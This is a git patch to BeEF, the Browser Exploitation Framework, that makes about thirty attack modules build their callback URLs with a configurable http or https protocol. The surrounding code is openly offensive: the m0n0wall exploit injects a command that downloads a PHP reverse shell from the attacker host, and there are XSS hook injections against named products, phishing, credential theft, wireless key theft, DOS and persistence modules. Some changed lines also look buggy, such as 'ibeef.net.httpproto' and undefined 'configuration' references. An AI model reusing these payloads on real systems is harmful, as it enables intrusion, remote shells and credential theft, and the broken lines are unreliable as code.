From 21417dc3e2dc8d0140fc84278214284406a8443b Mon Sep 17 00:00:00 2001 From: bcoles Date: Fri, 9 Aug 2013 13:21:33 +0930 Subject: [PATCH] Update BeEF server protocol for multiple modules to use `beef.http.https.enable` Now uses the `beef.net.httpproto` value rather than a hard-coded protocol string. Part of issue #745 --- .../hooked_domain/deface_web_page/module.rb | 3 ++- .../get_stored_credentials/module.rb | 3 ++- .../site_redirect_iframe/module.rb | 3 ++- modules/browser/play_sound/module.rb | 3 ++- modules/browser/webcam/command.js | 4 ++-- .../browser/webcam_permission_check/command.js | 4 ++-- .../chrome_extensions/inject_beef/command.js | 2 +- modules/debug/test_http_bind_raw/module.rb | 3 ++- .../beef_bind_staged_deploy/command.js | 3 ++- .../local_host/java_payload/command.js | 2 +- modules/exploits/m0n0wall/command.js | 2 +- modules/exploits/sqlitemanager_xss/module.rb | 3 ++- .../xss/alienvault_ossim_3.1_xss/module.rb | 3 ++- .../cisco_collaboration_server_5_xss/module.rb | 3 ++- .../exploits/xss/serendipity_1.6_xss/module.rb | 3 ++- modules/host/get_internal_ip/command.js | 2 +- modules/host/get_physical_location/command.js | 2 +- modules/host/get_system_info/command.js | 2 +- .../host/get_system_info/getSystemInfo.java | 2 +- modules/host/get_wireless_keys/command.js | 2 +- modules/host/hook_default_browser/command.js | 2 +- modules/host/hook_default_browser/module.rb | 10 ++++++---- modules/misc/iframe_sniffer/command.js | 2 +- modules/network/DOSer/command.js | 18 +++++++++--------- modules/network/ping_sweep_java/command.js | 2 +- modules/persistence/popunder_window/command.js | 2 +- .../phonegap/phonegap_persistence/module.rb | 3 ++- .../social_engineering/clickjacking/module.rb | 3 ++- .../fake_flash_update/module.rb | 5 +++-- .../fake_notification_ff/module.rb | 3 ++- .../gmail_phishing/module.rb | 4 ++-- .../social_engineering/pretty_theft/module.rb | 3 ++- .../replace_video_fake_plugin/module.rb | 3 ++- .../social_engineering/tabnabbing/module.rb | 3 ++- 34 files changed, 68 insertions(+), 49 deletions(-) diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index 2965cb776..2ac01f37d 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ { 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, { 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb index 093ca44aa..6effcc26c 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/module.rb +++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb @@ -7,7 +7,8 @@ class Get_stored_credentials < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html" return [ { 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' } ] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb index 813dc802a..6bfe3298f 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb +++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb @@ -7,7 +7,8 @@ class Site_redirect_iframe < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb index 9c4eb75a3..e8166c33c 100644 --- a/modules/browser/play_sound/module.rb +++ b/modules/browser/play_sound/module.rb @@ -9,8 +9,9 @@ class Play_sound < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - sound_file_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav" + sound_file_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav" return [{ 'name' => 'sound_file_uri', diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js index bb3465385..d3c42af0a 100644 --- a/modules/browser/webcam/command.js +++ b/modules/browser/webcam/command.js @@ -43,10 +43,10 @@ beef.execute(function() { theHead.appendChild(style); //A nice library that helps us to include the swf file - var swfobject_script = '' + var swfobject_script = '' //This is the javascript that actually calls the swfobject library to include the swf file - var include_script = ''; + var include_script = ''; //Empty body first $j('body').html(''); diff --git a/modules/browser/webcam_permission_check/command.js b/modules/browser/webcam_permission_check/command.js index ba7b241e4..af4ee2610 100644 --- a/modules/browser/webcam_permission_check/command.js +++ b/modules/browser/webcam_permission_check/command.js @@ -62,10 +62,10 @@ beef.execute(function() { }); //A library that helps include the swf file - //var swfobject_script = '' + //var swfobject_script = '' //This is the javascript that actually calls the swfobject library to include the swf file - //var include_script = ''; + //var include_script = ''; //Add flash content diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 5243259e1..01d0117ef 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -6,7 +6,7 @@ beef.execute(function() { - var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; chrome.windows.getAll({"populate" : true}, function(windows) { for(i in windows) { diff --git a/modules/debug/test_http_bind_raw/module.rb b/modules/debug/test_http_bind_raw/module.rb index 5eb456845..75d2bbb82 100644 --- a/modules/debug/test_http_bind_raw/module.rb +++ b/modules/debug/test_http_bind_raw/module.rb @@ -7,7 +7,8 @@ class Test_http_bind_raw < BeEF::Core::Command def pre_send configuration = BeEF::Core::Configuration.instance - xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1) end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js index dff727eb9..22702db22 100755 --- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js @@ -13,6 +13,7 @@ beef.execute(function () { var beef_host = '<%= @beef_host %>'; var beef_port = '<%= @beef_port %>'; + var beef_proto = beef.net.httpproto; var beef_junk_port = '<%= @beef_junk_port %>'; var sock_name = '<%= @beef_junk_socket %>'; @@ -190,7 +191,7 @@ beef.execute(function () { var size,host,contenttype,referer,nops = null; get_junk_size = function(){ var junk_name = ""; - var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name; + var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name; $j.ajax({ type: "GET", diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js index 52cdb5128..fc2665027 100755 --- a/modules/exploits/local_host/java_payload/command.js +++ b/modules/exploits/local_host/java_payload/command.js @@ -9,7 +9,7 @@ beef.execute(function() { var conn = '<%= @conn %>'; var cbHost = '<%= @cbHost %>'; var cbPort = '<%= @cbPort %>'; - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; diff --git a/modules/exploits/m0n0wall/command.js b/modules/exploits/m0n0wall/command.js index 9501a1237..0e0981fda 100644 --- a/modules/exploits/m0n0wall/command.js +++ b/modules/exploits/m0n0wall/command.js @@ -10,7 +10,7 @@ beef.execute(function() { var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; - var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27http%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B"; + var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B"; beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb index 970693e67..a5e6b536d 100644 --- a/modules/exploits/sqlitemanager_xss/module.rb +++ b/modules/exploits/sqlitemanager_xss/module.rb @@ -8,7 +8,8 @@ class Sqlitemanager_xss < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" return [ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url='} diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb index 5d1921f58..cc8d0732a 100644 --- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb @@ -8,7 +8,8 @@ class Cisco_collaboration_server_5_xss < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" return [ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'} diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb index a413e5b13..68356a916 100644 --- a/modules/exploits/xss/serendipity_1.6_xss/module.rb +++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb @@ -8,7 +8,8 @@ class Serendipity_1_6_xss < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" return [ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'} diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js index 165dc1c4a..b6b9361f4 100755 --- a/modules/host/get_internal_ip/command.js +++ b/modules/host/get_internal_ip/command.js @@ -6,7 +6,7 @@ beef.execute(function() { - var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; + var applet_uri = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/'; var internal_counter = 0; var timeout = 30; var output; diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js index 05d1c07a7..4baf94a9d 100755 --- a/modules/host/get_physical_location/command.js +++ b/modules/host/get_physical_location/command.js @@ -5,7 +5,7 @@ */ beef.execute(function() { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; var output; diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js index 5c8afad87..61cddde05 100644 --- a/modules/host/get_system_info/command.js +++ b/modules/host/get_system_info/command.js @@ -10,7 +10,7 @@ beef.execute(function() { var timeout = 30; var output; - beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', "http://"+beef.net.host+":"+beef.net.port+"/", null, null); + beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', ibeef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null); if (beef.browser.isFF()) { diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java index 2c912cc76..f90984200 100644 --- a/modules/host/get_system_info/getSystemInfo.java +++ b/modules/host/get_system_info/getSystemInfo.java @@ -152,7 +152,7 @@ public class getSystemInfo extends Applet { } } else { //Trying to insert the Beeffeine applet - content = ""; + content = ""; $j('body').append(content); internal_counter = 0; //We have to kick off a loop now, because the user has to accept the running of the applet perhaps diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js index f40859427..8559a4637 100644 --- a/modules/host/get_wireless_keys/command.js +++ b/modules/host/get_wireless_keys/command.js @@ -5,7 +5,7 @@ */ beef.execute(function() { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; var output; diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js index ba4e65dbe..b008bd100 100644 --- a/modules/host/hook_default_browser/command.js +++ b/modules/host/hook_default_browser/command.js @@ -6,7 +6,7 @@ beef.execute(function() { - var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; + var pdf_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; window.open( pdf_url, '_blank'); beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser."); diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb index dbbca47d1..f85f6e8af 100644 --- a/modules/host/hook_default_browser/module.rb +++ b/modules/host/hook_default_browser/module.rb @@ -8,7 +8,8 @@ class Hook_default_browser < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" return [ #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, ] @@ -16,11 +17,12 @@ class Hook_default_browser < BeEF::Core::Command def pre_send - #Get the servers configurations. - configuration = BeEF::Core::Configuration.instance + #Get the servers configurations. + configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" #The hook url to be replace the token in the original pdf file. - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" # A new pdf file containg the actual hook URI instead of the dummy token. configured_hook_file = File.open("./modules/host/hook_default_browser/bounce_to_ie_configured.pdf","w") diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 4c2bd70d9..65edd2462 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js @@ -24,7 +24,7 @@ beef.execute(function() { var leakyscript = document.createElement('script'); leakyscript.setAttribute('type', 'text/javascript'); - leakyscript.setAttribute('src', 'http://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); + leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); var theparent = document.getElementsByTagName('head')[0]; theparent.insertBefore(leakyscript, theparent.firstChild); } diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js index bac612bd1..0c4307722 100644 --- a/modules/network/DOSer/command.js +++ b/modules/network/DOSer/command.js @@ -12,19 +12,19 @@ beef.execute(function() { var post_data = '<%= @post_data %>'; if(!!window.Worker){ - var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js'); + var myWorker = new Worker(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/worker.js'); - myWorker.onmessage = function (oEvent) { + myWorker.onmessage = function (oEvent) { beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data); - }; + }; - var data = {}; - data['url'] = url; - data['delay'] = delay; - data['method'] = method; - data['post_data'] = post_data; + var data = {}; + data['url'] = url; + data['delay'] = delay; + data['method'] = method; + data['post_data'] = post_data; - myWorker.postMessage(data); + myWorker.postMessage(data); }else{ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.'); } diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js index 2c2e07802..75304958d 100644 --- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js @@ -15,7 +15,7 @@ beef.execute(function() { var internal_counter = 0; var firstMsgSent = false; - beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); + beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); function waituntilok() { try { diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index cc3aabd4f..9ed5b6beb 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -8,7 +8,7 @@ beef.execute(function() { var result = "Pop-under window successfully created!"; - window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); + window.open(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); window.focus(); diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 210a634da..7c262bbe9 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -11,6 +11,7 @@ class Phonegap_persistence < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") @@ -18,7 +19,7 @@ class Phonegap_persistence < BeEF::Core::Command 'name' => 'hook_url', 'description' => 'The URL of your BeEF hook', 'ui_label'=>'Hook URL', - 'value' => 'http://'+beef_host+':'+beef_port+'/hook.js', + 'value' => proto + '://'+beef_host+':'+beef_port+'/hook.js', 'width' => '300px' }] end diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb index 3524ddba3..809e07a88 100644 --- a/modules/social_engineering/clickjacking/module.rb +++ b/modules/social_engineering/clickjacking/module.rb @@ -9,7 +9,8 @@ class Clickjacking < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjacking/clickjack_victim.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjacking/clickjack_victim.html" return [ {'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' => uri, 'width' => '400px', 'height' => '50px'}, diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb index cbdfaf4ff..25ed298f5 100644 --- a/modules/social_engineering/fake_flash_update/module.rb +++ b/modules/social_engineering/fake_flash_update/module.rb @@ -7,8 +7,9 @@ class Fake_flash_update < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - payload_root = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}" - image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}" + image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png" return [ {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}, diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb index fba9d4154..b7e5a2055 100644 --- a/modules/social_engineering/fake_notification_ff/module.rb +++ b/modules/social_engineering/fake_notification_ff/module.rb @@ -7,8 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension' + url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension' return [ {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'}, { 'name' => 'notification_text', diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb index 46e32c154..801ae48b7 100644 --- a/modules/social_engineering/gmail_phishing/module.rb +++ b/modules/social_engineering/gmail_phishing/module.rb @@ -7,8 +7,8 @@ class Gmail_phishing < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - - xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" logout_gmail_interval = 10000 wait_seconds_before_redirect = 1000 return [ diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index 07e1aea9b..e8bd1fc6e 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -7,7 +7,8 @@ class Pretty_theft < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + logo_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" return [ {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb index bae133509..cc32a7f42 100644 --- a/modules/social_engineering/replace_video_fake_plugin/module.rb +++ b/modules/social_engineering/replace_video_fake_plugin/module.rb @@ -7,8 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") + url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port") return [ {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'}, {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'} diff --git a/modules/social_engineering/tabnabbing/module.rb b/modules/social_engineering/tabnabbing/module.rb index 3532efce9..d6e9698d8 100644 --- a/modules/social_engineering/tabnabbing/module.rb +++ b/modules/social_engineering/tabnabbing/module.rb @@ -7,7 +7,8 @@ class Tabnabbing < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" return [ { 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width'=>'400px' }, { 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width'=>'150px' }